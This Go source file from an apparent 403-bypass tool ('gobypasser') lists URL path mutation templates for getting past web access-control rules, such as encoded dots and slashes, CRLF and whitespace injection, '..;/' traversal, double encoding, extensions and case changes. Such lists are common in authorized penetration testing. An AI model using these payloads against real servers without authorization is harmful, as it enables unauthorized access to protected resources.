package gobypasser

var PathBypasses = []string{
	"{base_url}/{base_path}",
	"{base_url}/{base_path}/",
	"{base_url}/{base_path}#",
	"{base_url}/{base_path}//",
	"{base_url}/{base_path}///",
	"{base_url}//{base_path}",
	"{base_url}//{base_path}//",
	"{base_url}/%2f/{base_path}",
	"{base_url}/%2f/{base_path}/",
	"{base_url}/{base_path}/*",
	"{base_url}/{base_path}/*/",
	"{base_url}/%2e/{base_path}",
	"{base_url}/%2e/{base_path}/",
	"{base_url}/%2e//{base_path}",
	"{base_url}/%2e//{base_path}/",
	"{base_url}/./{base_path}",
	"{base_url}/./{base_path}/",
	"{base_url}/.//{base_path}",
	"{base_url}/.//{base_path}/",
	"{base_url}/{base_path}/.",
	"{base_url}/{base_path}/./",
	"{base_url}/./{base_path}/.",
	"{base_url}/./{base_path}/./",
	"{base_url}/{base_path}%0d",
	"{base_url}/{base_path}%0d/",
	"{base_url}/{base_path}%0a",
	"{base_url}/{base_path}%0a/",
	"{base_url}/{base_path}%0b",
	"{base_url}/{base_path}%0b/",
	"{base_url}/{base_path}%0d%0a",
	"{base_url}/{base_path}%0d%0a/",
	"{base_url}/{base_path}%09",
	"{base_url}/{base_path}%09/",
	"{base_url}/{base_path}%20",
	"{base_url}/{base_path}%20/",
	"{base_url}/%20{base_path}%20",
	"{base_url}/%20{base_path}%20/",
	"{base_url}/{base_path}/..;/",
	"{base_url}/{base_path}..;/",
	"{base_url}/{base_path}/../",
	"{base_url}/{base_path}/....//",
	"{base_url}/{base_path}/..\\",
	"{base_url}/{base_path}/....\\\\",
	"{base_url}/test../{base_path}",
	"{base_url}/test../{base_path}/",
	"{base_url}/test/../{base_path}",
	"{base_url}/test/../{base_path}/",
	"{base_url}/{base_path}?",
	"{base_url}/{base_path}??",
	"{base_url}/{base_path}???",

	// Matrix-parameter / path-parameter tricks.
	"{base_url}/{base_path};/",
	"{base_url}/{base_path};foo=bar",
	"{base_url}/{base_path}/;/",

	// Double URL-encoding of the traversal/slash primitives.
	"{base_url}/%252e/{base_path}",
	"{base_url}/%252f/{base_path}",
	"{base_url}/{base_path}%252f",

	// Appended file extensions — some routers match on suffix.
	"{base_url}/{base_path}.json",
	"{base_url}/{base_path}.html",
	"{base_url}/{base_path}/.json",

	// Case variations — case-insensitive backends may bypass a case-sensitive ACL.
	"{base_url}/{base_path_upper}",
	"{base_url}/{base_path_title}",
	// "{base_url}/{base_path}/.[random_string]",
	// "{base_url}/{base_path}/.[file_extension]",
	// "{base_url}/{base_path}.[random_string]",
	// "{base_url}/{base_path}.[file_extension]",
	// "{base_url}/{base_path}/?[param]",
}
